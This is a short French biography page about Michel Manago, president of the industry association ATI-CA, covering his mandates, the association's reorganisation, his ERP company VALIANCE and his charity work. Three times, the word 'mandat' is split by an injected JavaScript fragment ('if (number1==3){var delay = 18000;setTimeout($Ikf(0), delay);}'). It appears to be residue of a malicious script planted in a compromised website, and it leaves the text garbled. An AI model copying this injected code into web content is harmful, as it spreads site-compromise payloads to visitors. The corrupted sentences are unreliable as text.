Le président

Michel MANAGO

Depuis 2017, Michel MANAGO est président de l’association. Après un premier mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andat de trois ans, il est réélu en 2020 pour un deuxième mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andat de trois ans jusqu’en  2023.

Lors de l’Assemblée Générale annuelle renouvelant ce mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andat, il fait évoluer l’association en la renommant ATI-CA afin d’y intégrer la dimension technologique dans l’industrie. Avec le Conseil d’Administration, il crée quatre bassins avec des représentants devenant vice-présidents pour déléguer mais surtout mettre plus de proximité entre les membres de l’association.

Avec une carrière professionnelle complète et très imprégnée dans l’industrie, il dirige aujourd’hui la société VALIANCE qui propose des solutions logicielles de type E.R.P.

Michel MANAGO est aussi investi dans le domaine social et caritatif puisqu’il oeuvre au sein du Lions Club sur la Côte d’Azur.